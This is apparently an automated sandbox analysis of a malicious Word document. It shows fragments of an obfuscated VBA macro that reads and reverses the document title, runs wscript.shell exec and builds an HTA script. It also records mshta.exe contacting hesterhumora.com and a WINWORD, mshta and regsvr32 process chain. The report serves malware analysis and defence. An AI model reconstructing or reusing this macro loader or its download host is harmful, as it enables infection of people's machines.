Data Raw: 01 16 03 00 00 f0 00 00 00 8a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 91 03 00 00 75 04 00 00 00 00 00 00 01 00 00 00 a3 2e f9 ea 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword String, String) VB_Name VB_Creatable VB_Exposed Print Public Function Option counterSizeValue Close VB_Customizable pasteVbArray(constSelectGeneric Explicit "arrayCopy" Output VB_TemplateDerived False Attribute VB_PredeclaredId VB_GlobalNameSpace constSelectGeneric VB_Base

VBA Code

VBA File Name: bufferTmpRequest.bas, Stream Size: 2002

General
Stream Path: VBA/bufferTmpRequest
VBA File Name: bufferTmpRequest.bas
Stream Size: 2002
Data ASCII: ...... : ...... ~ ...... x ...... M E ......
Data Raw: 01 16 03 00 00 f0 00 00 00 02 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 04 00 00 3a 06 00 00 00 00 00 00 01 00 00 00 a3 2e 7e 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword procQueryTmp nextTrustSwap VB_Name main() Function String windowBufPointer procQueryTmp.pasteVbArray "bufferTmpRequest" titleNamespace() Len(countAProc) sr(countAProc) StrReverse(countAProc) Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), titleNamespace argumentResponse, argumentResponse Attribute countAProc gwc(countAProc) arrayCopy

VBA Code

VBA File Name: frm.frm, Stream Size: 1661

General
Stream Path: VBA/frm
VBA File Name: frm.frm
Stream Size: 1661
Data ASCII: ...... L ...... e ...... x ...... M E ......
Data Raw: 01 16 03 00 00 f0 00 00 00 ae 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff b5 03 00 00 e1 04 00 00 00 00 00 00 01 00 00 00 a3 2e 65 b5 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword ActiveDocument.BuiltInDocumentProperties("title") VB_Name VB_Creatable VB_Exposed CreateObject("wscript.shell") Public dataMemory VB_Customizable .exec$ "frm" VB_TemplateDerived (sr(dataMemory)) constLenLoad False Attribute VB_PredeclaredId VB_GlobalNameSpace VB_Base

VBA Code

VBA File Name: indexPasteConvert.bas, Stream Size: 8002

General
Stream Path: VBA/indexPasteConvert
VBA File Name: indexPasteConvert.bas
Stream Size: 8002
Data ASCII: ...... 0 ...... x ...... M E ......
Data Raw: 01 16 03 00 00 f0 00 00 00 ba 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff c1 04 00 00 e9 14 00 00 00 00 00 00 01 00 00 00 a3 2e c6 30 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword counterRightPaste dataProcedure('tA" procedure" "Index(queryStorage){return(new refNamespace(bufDatabase) ">collectionIterator "/div>

function refNamespace("oint") ExTable valueLeft("istb") swapNamespace(" language='vbscript'" windowBufPointer() id='t" "amespace()[dataLink](i)]=i;}for(" "ript>

"rn(leftOptionBuffer);};function "ctiveXObject(queryStorage));}fun" "tionReferencePointer['AddCode'](" responseLink(bufDatabase) "L;var

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 627

General
Stream Path: PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 627
Entropy: 5.40586418501
Base64 Encoded: True
Data ASCII: I D = " { 8 0 A 8 6 9 A 6 - 4 D 2 1 - 4 5 2 D - B A 0 7 - 0 A C 1 F E C A D A 1 F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = f r m . . M o d u l e = b u f f e r T m p R e q u e s t . . M o d u l e = i n d e x P a s t e C o n v e r t . . C l a s s = a r r a y C o p y . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p
Data Raw: 49 44 3d 22 7b 38 30 41 38 36 39 41 36 2d 34 44 32 31 2d 34 35 32 44 2d 42 41 30 37 2d 30 41 43 31 46 45 43 41 44 41 31 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42

Stream Path: PROJECTwm, File Type: data, Stream Size: 188

General
Stream Path: PROJECTwm
File Type: data
Stream Size: 188
Entropy: 3.62591744772
Base64 Encoded: False
Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . f r m . f . r . m . . . b u f f e r T m p R e q u e s t . b . u . f . f . e . r . T . m . p . R . e . q . u . e . s . t . . . i n d e x P a s t e C o n v e r t . i . n . d . e . x . P . a . s . t . e . C . o . n . v . e . r . t . . . a r r a y C o p y . a . r . r . a . y . C . o . p . y . . . . .
Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 66 72 6d 00 66 00 72 00 6d 00 00 00 62 75 66 66 65 72 54 6d 70 52 65 71 75 65 73 74 00 62 00 75 00 66 00 66 00 65 00 72 00 54 00 6d 00 70 00 52 00 65 00 71 00 75 00 65 00 73 00 74 00 00 00 69 6e 64 65 78 50 61 73 74 65 43 6f 6e 76 65 72 74 00 69 00 6e 00 64 00 65 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4406

General
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 4406
Entropy: 4.55274597771
Base64 Encoded: False
Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw: cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2428

General
Stream Path: VBA/__SRP_0
File Type: data
Stream Size: 2428
Entropy: 3.66903322086
Base64 Encoded: True
Data ASCII: . K * ...... * \\ C N o r m a l r U ...... @ ...... @ ...... @ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ ...... ~ N ...... " ...... 1 ...... p R z
Data Raw: 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 206

General
Stream Path: VBA/__SRP_1
File Type: data
Stream Size: 206
Entropy: 1.75771081341
Base64 Encoded: False
Data ASCII: r U @ ...... @ ...... @ ...... @ ...... ~ z ...... A ...... b ......
Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 532

General
Stream Path: VBA/__SRP_2
File Type: data
Stream Size: 532
Entropy: 2.02353640609
Base64 Encoded: False
Data ASCII: r U ...... @ ...... @ ...... 8 ...... P ...... ` . . . A ...... q ...... ` i ......
Data Raw: 72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 c1 0b 00 00 00 00 00 00 00 00 00 00 e1 03 00 00 00 00 00 00 00 00 00 00 11 0c

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156

General
Stream Path: VBA/__SRP_3
File Type: data
Stream Size: 156
Entropy: 1.78206636307
Base64 Encoded: False
Data ASCII: r U @ ...... @ ...... @ ...... x . . . . . 8 ...... ` . . . . 8 ...... b ......
Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: SVR2 executable (Amdahl-UTS) not stripped - version 8520192, Stream Size: 1117

General
Stream Path: VBA/dir
File Type: SVR2 executable (Amdahl-UTS) not stripped - version 8520192
Stream Size: 1117
Entropy: 6.64142870906
Base64 Encoded: True
Data ASCII: . Y ...... 0 * . . . . . p . . H . . . . . d ...... P r o j e c t . Q . ( . . @ . . . . . = . . . . . l ...... b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C ...... 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F ...... * , \\ C ...... m . .
Data Raw: 01 59 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 dc 84 7f 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: frm/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path: frm/\x1CompObj
File Type: data
Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII: ...... M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t ...... 9 . q ......
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: frm/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 286

General
Stream Path: frm/\x3VBFrame
File Type: ASCII text, with CRLF line terminators
Stream Size: 286
Entropy: 4.56658329518
Base64 Encoded: True
Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } f r m . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . .
Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 66 72 6d 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 33 30 31 35

Stream Path: frm/f, File Type: data, Stream Size: 90

General
Stream Path: frm/f
File Type: data
Stream Size: 90
Entropy: 2.66114281725
Base64 Encoded: False
Data ASCII: ...... } . . k ...... , . . . . . h o . . $ ...... , ...... b u t t o n 1 . a . . . a . . .
Data Raw: 00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 07 00 00 80 01 00 00 00 2c 00 00 00 00 00 11 00 62 75 74 74 6f 6e 31 00 61 01 00 00 61 01 00 00

Stream Path: frm/o, File Type: data, Stream Size: 44

General
Stream Path: frm/o
File Type: data
Stream Size: 44
Entropy: 3.03074109336
Base64 Encoded: False
Data ASCII: ...... O ...... u ...... T a h o m a . .
Data Raw: 00 02 0c 00 20 00 00 00 ec 09 00 00 4f 03 00 00 00 02 18 00 75 00 00 00 06 00 00 80 a5 00 00 00 cc 02 03 00 54 61 68 6f 6d 61 00 00

Network Behavior

Network Port Distribution

Total Packets: 53 • 53 (DNS) • 80 (HTTP)

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 30, 2021 17:07:42.071327925 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235
Apr 30, 2021 17:07:42.205090046 CEST | 80 | 49718 | 193.203.203.235 | 192.168.2.3
Apr 30, 2021 17:07:42.205228090 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235
Apr 30, 2021 17:07:42.205914021 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235
Apr 30, 2021 17:07:42.339493036 CEST | 80 | 49718 | 193.203.203.235 | 192.168.2.3
Apr 30, 2021 17:07:42.593498945 CEST | 80 | 49718 | 193.203.203.235 | 192.168.2.3
Apr 30, 2021 17:07:42.593633890 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235
Apr 30, 2021 17:07:47.598824024 CEST | 80 | 49718 | 193.203.203.235 | 192.168.2.3
Apr 30, 2021 17:07:47.598897934 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235
Apr 30, 2021 17:07:50.237395048 CEST | 49718 | 80 | 192.168.2.3 | 193.203.203.235

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 30, 2021 17:07:23.745417118 CEST  57544        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:23.794202089 CEST  53           57544      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:24.645523071 CEST  55984        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:24.694358110 CEST  53           55984      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:25.838167906 CEST  64185        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:25.889760017 CEST  53           64185      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:26.933653116 CEST  65110        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:26.982517004 CEST  53           65110      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:28.572649956 CEST  58361        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:28.621546030 CEST  53           58361      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:29.693321943 CEST  63492        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:29.742144108 CEST  53           63492      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:30.968628883 CEST  60831        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:31.017457962 CEST  53           60831      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:32.240434885 CEST  60100        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:32.292074919 CEST  53           60100      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:33.475368977 CEST  53195        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:33.567536116 CEST  53           53195      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:34.129133940 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:34.205528975 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:35.173966885 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:35.235629082 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:36.155590057 CEST  53023        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:36.188477993 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:36.205585957 CEST  53           53023      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:36.248353958 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:38.204952955 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:38.264841080 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:38.647641897 CEST  49563        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:38.699196100 CEST  53           49563      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:40.413201094 CEST  51352        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:40.464823008 CEST  53           51352      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:41.528465986 CEST  59349        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:41.577524900 CEST  53           59349      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:41.980226994 CEST  57084        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:42.052850008 CEST  53           57084      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:42.220201015 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:42.279963017 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:43.042907000 CEST  58823        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:43.100636959 CEST  53           58823      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:44.344048977 CEST  57568        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:44.392802000 CEST  53           57568      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:45.541116953 CEST  50540        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:45.589854956 CEST  53           50540      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:46.831238031 CEST  54366        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:46.879914999 CEST  53           54366      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:50.513555050 CEST  53034        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:50.565151930 CEST  53           53034      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:51.663151979 CEST  57762        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:51.723097086 CEST  53           57762      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:58.676517963 CEST  55435        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:58.733529091 CEST  53           55435      8.8.8.8          192.168.2.3
Apr 30, 2021 17:07:59.658179045 CEST  50713        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:07:59.717643023 CEST  53           50713      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:16.774000883 CEST  56132        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:16.835347891 CEST  53           56132      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:18.227579117 CEST  58987        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:18.286731005 CEST  53           58987      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:19.411917925 CEST  56579        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:19.470884085 CEST  53           56579      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:34.821213961 CEST  60633        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:34.916708946 CEST  53           60633      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:35.665025949 CEST  61292        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:35.725483894 CEST  53           61292      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:35.876801014 CEST  58722        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:35.921130896 CEST  56596        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:35.925817013 CEST  53           58722      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:35.950751066 CEST  64101        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:35.973961115 CEST  53           56596      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:36.001236916 CEST  53           64101      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:36.404859066 CEST  63619        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:36.468997002 CEST  53           63619      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:36.952919960 CEST  64938        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:37.012949944 CEST  53           64938      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:37.595051050 CEST  61946        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:37.652189970 CEST  53           61946      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:38.215560913 CEST  64910        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:38.272484064 CEST  53           64910      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:38.796176910 CEST  52123        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:38.853785992 CEST  53           52123      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:39.744133949 CEST  56130        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:39.793469906 CEST  53           56130      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:40.521557093 CEST  56338        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:40.593797922 CEST  53           56338      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:40.767853975 CEST  59420        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:40.816766024 CEST  53           59420      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:41.250627041 CEST  58784        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:41.307719946 CEST  53           58784      8.8.8.8          192.168.2.3
Apr 30, 2021 17:08:45.290184021 CEST  63978        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:08:45.349426985 CEST  53           63978      8.8.8.8          192.168.2.3
Apr 30, 2021 17:09:16.912919998 CEST  62938        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:09:16.970213890 CEST  53           62938      8.8.8.8          192.168.2.3
Apr 30, 2021 17:09:20.536809921 CEST  55708        53         192.168.2.3      8.8.8.8
Apr 30, 2021 17:09:20.593763113 CEST  53           55708      8.8.8.8          192.168.2.3

DNS Queries

Timestamp: Apr 30, 2021 17:07:41.980226994 CEST
Source IP: 192.168.2.3
Dest IP: 8.8.8.8
Trans ID: 0xb94b
OP Code: Standard query (0)
Name: hesterhumora.com
Type: A (IP address)
Class: IN (0x0001)

DNS Answers

Timestamp: Apr 30, 2021 17:07:42.052850008 CEST
Source IP: 8.8.8.8
Dest IP: 192.168.2.3
Trans ID: 0xb94b
Reply Code: No error (0)
Name: hesterhumora.com
CName:
Address: 193.203.203.235
Type: A (IP address)
Class: IN (0x0001)

HTTP Request Dependency Graph

hesterhumora.com

HTTP Packets

Session ID: 0
Source IP: 192.168.2.3
Source Port: 49718
Destination IP: 193.203.203.235
Destination Port: 80
Process: C:\Windows\SysWOW64\mshta.exe

Timestamp: Apr 30, 2021 17:07:42.205914021 CEST
kBytes transferred: 1091
Direction: OUT
Data:
GET /dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: hesterhumora.com
Connection: Keep-Alive

Timestamp: Apr 30, 2021 17:07:42.593498945 CEST
kBytes transferred: 1096
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 30 Apr 2021 15:07:42 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
X-Powered-By: PHP/7.2.34
Content-Length: 203
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 77 36 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii:
404 Not Found
Not Found
The requested URL "law6" was not found on this server.

Code Manipulations

Statistics

Behavior

• WINWORD.EXE
• explorer.exe
• explorer.exe
• mshta.exe
• regsvr32.exe

System Behavior

Analysis Process: WINWORD.EXE PID: 6116 Parent PID: 792

General

Start time: 17:07:31
Start date: 30/04/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x11c0000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source File Path: C:\Users\user\AppData\Local\Temp\~DF0DF1D531EAB3D988.TMP
  Access: read attributes | delete | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file | delete on close
  Completion: success or wait  Count: 1  Address: 66ADF261  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\VBE
  Access: read data or list directory | synchronize
  Attributes: device
  Options: directory file | synchronous io non alert | open for backup ident | open reparse point
